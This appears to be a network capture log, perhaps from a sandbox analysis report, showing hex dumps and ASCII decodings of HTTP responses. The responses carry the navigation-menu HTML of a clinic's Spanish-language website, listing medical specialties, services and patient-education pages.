                                                                                                                                                                              2023-09-15 05:27:25 UTC83INData Raw: 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 6e 65 75 72 6f 63 69 72 75 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4e 65 75 72 6f 63 69 72 75 67 c3 ad 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72
                                                                                                                                                                              Data Ascii: <li class="menu-item "><a href="especialidades/pediatricas/neurocirugia" target="_self">Neurociruga</a></li> <li class="menu-item "><a hr
                                                                                                                                                                              2023-09-15 05:27:25 UTC84INData Raw: 61 20 66 61 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 70 71 2d 73 75 62 6d 65 6e 75 2d 69 63 6f 6e 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 67 69 6e 65 63 6f 62 73 74 65 74 72 69 63 69 61 73 2f 67 69 6e 65 63 6f 6c 6f 67 69 61 2d 79 2d 67 69 6e 65 63 6f 62 73 74 65 74 72 69 63 69 61 22 0a
                                                                                                                                                                              Data Ascii: a fa-chevron-down pq-submenu-icon"></i> <ul class="sub-menu"> <li class="menu-item "><a href="especialidades/ginecobstetricias/ginecologia-y-ginecobstetricia"
                                                                                                                                                                              2023-09-15 05:27:25 UTC86INData Raw: 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 68 6f 73 70 69 74 61 6c 69 7a 61 63 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 48 6f 73 70 69 74 61 6c 69 7a 61 63 69 c3 b3 6e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: /li> <li class="menu-item "><a href="servicios/hospitalizacion" target="_self">Hospitalizacin</a></li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC87INData Raw: 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 47 65 6e 65 72 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 69 72 75 67 69 61 2f 67 69 6e 65 63 6f 6c 6f 67 69 63 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 47 69 6e 65 63 6f 6c c3 b3 67 69 63 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: target="_self">General</a></li> <li class="menu-item "><a href="servicios/cirugia/ginecologica" target="_self">Ginecolgica</a></li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC88INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 69 72 75 67 69 61 2f 70 6c 61 73 74 69 63 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 6c c3 a1 73 74 69 63 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72
                                                                                                                                                                              Data Ascii: <li class="menu-item "><a href="servicios/cirugia/plastica" target="_self">Plstica</a></li> <li class="menu-item "><a hr
                                                                                                                                                                              2023-09-15 05:27:25 UTC90INData Raw: 20 69 6e 74 65 6e 73 69 76 6f 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 70 71 2d 73 75 62 6d 65 6e 75 2d 69 63 6f 6e 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f
                                                                                                                                                                              Data Ascii: intensivos</a> <i class="fa fa-chevron-down pq-submenu-icon"></i> <ul class="sub-menu"> <li class="menu-item "><a href="servicios/
                                                                                                                                                                              2023-09-15 05:27:25 UTC91INData Raw: 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 55 6e 69 64 61 64 20 64 65 20 61 6c 74 6f 20 72 69 65 73 67 6f 20 6f 62 73 74 c3 a9 74 72 69 63 6f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 73 61 6c 61 73 2d 64 65 2d 70 61 72 74 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 53 61 6c
                                                                                                                                                                              Data Ascii: target="_self">Unidad de alto riesgo obsttrico</a></li> <li class="menu-item "><a href="servicios/salas-de-parto" target="_self">Sal
                                                                                                                                                                              2023-09-15 05:27:25 UTC92INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 2f 72 61 64 69 6f 6c 6f 67 69 61 2d 69 6e 74 65 72 76 65 6e 63 69 6f 6e 69 73 74 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 52 61 64 69 6f 6c 6f 67 c3 ad 61 20 69 6e 74 65 72 76 65 6e 63 69 6f 6e 69 73 74 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <li class="menu-item "><a href="servicios/apoyo-diagnostico/radiologia-intervencionista" target="_self">Radiologa intervencionista</a></li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC94INData Raw: 61 67 6e 6f 73 74 69 63 6f 73 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 45 73 74 75 64 69 6f 73 20 65 6c 65 63 74 72 6f 20 64 69 61 67 6e c3 b3 73 74 69 63 6f 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: agnosticos" target="_self">Estudios electro diagnsticos</a></li> </ul> </li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC95INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 74 65 72 61 70 69 61 2f 66 6f 6e 6f 61 75 64 69 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 46 6f 6e 6f 61 75 64 69 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <li class="menu-item "><a href="servicios/terapia/fonoaudiologia" target="_self">Fonoaudiologa</a></li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC96INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 41 73 65 73 6f 72 c3 ad 61 20 65 6e 20 6c 61 63 74 61 6e 63 69 61 20 6d 61 74 65 72 6e 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 70 72 6f 67 72 61 6d 61 2d 6d 61 6d 61 2d 63 61 6e 67 75 72 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: target="_self">Asesora en lactancia materna</a></li> <li class="menu-item "><a href="servicios/programa-mama-canguro"
                                                                                                                                                                              2023-09-15 05:27:25 UTC98INData Raw: 63 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 43 6c c3 ad 6e 69 63 61 20 64 65 20 74 65 72 61 70 69 61 20 63 65 74 6f 67 c3 a9 6e 69 63 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 6e 75 74 72 69 63 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: ca" target="_self">Clnica de terapia cetognica</a></li> <li class="menu-item "><a href="servicios/nutricion"
                                                                                                                                                                              2023-09-15 05:27:25 UTC99INData Raw: 38 30 30 30 0d 0a 65 6c 66 22 3e 53 69 73 74 65 6d 61 20 64 65 20 49 6e 66 6f 72 6d 61 63 69 c3 b3 6e 20 79 20 41 74 65 6e 63 69 c3 b3 6e 20 61 6c 20 55 73 75 61 72 69 6f 20 28 53 49 41 55 29 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 61 6c 2d 70 61 63 69 65 6e 74 65 2f 63 6f 6e 73 75 6c 74 61 2d 65 78 74 65 72 6e 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: 8000elf">Sistema de Informacin y Atencin al Usuario (SIAU)</a></li> <li class="menu-item "><a href="pacientes/educacion-al-paciente/consulta-externa"
                                                                                                                                                                              2023-09-15 05:27:25 UTC100INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 48 6f 73 70 69 74 61 6c 69 7a 61 63 69 c3 b3 6e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 61 6c 2d 70 61 63 69 65 6e 74 65 2f 75 72 67 65 6e 63 69 61 73 2d 70 65 64 69 61 74 72 69 63 61 73 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: target="_self">Hospitalizacin</a></li> <li class="menu-item "><a href="pacientes/educacion-al-paciente/urgencias-pediatricas"
                                                                                                                                                                              2023-09-15 05:27:25 UTC102INData Raw: 6e 74 65 2f 73 65 67 75 72 69 64 61 64 2d 64 65 6c 2d 70 61 63 69 65 6e 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 53 65 67 75 72 69 64 61 64 20 64 65 6c 20 50 61 63 69 65 6e 74 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: nte/seguridad-del-paciente" target="_self">Seguridad del Paciente</a></li> </ul> </li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC103INData Raw: 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4e 6f 74 69 63 69 61 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 2f 62 6c 6f 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 6c 6f 67 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: target="_self">Noticias</a></li> <li class="menu-item "><a href="publicaciones/blog" target="_self">Blog</a></li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC104INData Raw: 70 74 3a 76 6f 69 64 28 30 29 22 20 69 64 3d 22 70 71 2d 73 65 61 63 72 68 2d 62 74 6e 22 3e 3c 69 20 63 6c 61 73 73 3d 22 74 69 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 73 65 61 72 63 68 2d 66 6f 72 6d 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f
                                                                                                                                                                              Data Ascii: pt:void(0)" id="pq-seacrh-btn"><i class="ti-search"></i></a> <div class="pq-search-form"> <form role="search" method="get" class="search-form" action="https:/
                                                                                                                                                                              2023-09-15 05:27:25 UTC106INData Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 66 66 63 61 6e 76 61 73 20 6f 66 66 63 61 6e 76 61 73 2d 73 74 61 72 74 20 68 69 64 64 65 6e 22 20 69 64 3d 22 63 61 6e 76 61 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 66 66 63 61 6e 76 61 73 2d 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 4c 6f 67 6f 20 63 6c 69 6e 69 63 61 20 73 61 6e 20 6c 75 69 73 22 20 77 69 64 74 68 3d 22 31 33 30 70 78 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f
                                                                                                                                                                              Data Ascii: </div> </div> <div class="offcanvas offcanvas-start hidden" id="canva-menu"> <div class="offcanvas-header"> <img src="assets/images/logo.png" alt="Logo clinica san luis" width="130px" loading="lazy"> <button type="butto
                                                                                                                                                                              2023-09-15 05:27:25 UTC107INData Raw: 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 6e 75 65 73 74 72 61 2d 68 69 73 74 6f 72 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4e 75 65 73 74 72 61 20 68 69 73 74 6f 72 69 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: class="nav-item ps-2 "><a class="nav-link" href="nosotros/nuestra-historia" target="_self">Nuestra historia</a></li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC108INData Raw: 20 74 72 61 74 61 6d 69 65 6e 74 6f 20 64 65 20 64 61 74 6f 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 69 6e 64 69 63 61 64 6f 72 2d 64 65 2d 73 61 74 69 73 66 61 63 63 69 6f 6e 22 0a 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: tratamiento de datos</a></li> <li class="nav-item ps-2 "><a class="nav-link" href="nosotros/indicador-de-satisfaccion"
                                                                                                                                                                              2023-09-15 05:27:25 UTC110INData Raw: 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 73 69 63 6f 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 53 69 63 6f 66 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: nav-item ps-2 "><a class="nav-link" href="nosotros/sicof" target="_self">Sicof</a></li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC111INData Raw: 75 6c 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 70 73 2d 32 22 20 69 64 3d 22 73 75 62 6d 65 6e 75 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 62 65 74 77 65 65 6e 22 20
                                                                                                                                                                              Data Ascii: ul class="collapse ps-2" id="submenu-3"> <li class="nav-item ps-2"> <a class="nav-link d-flex justify-content-between"
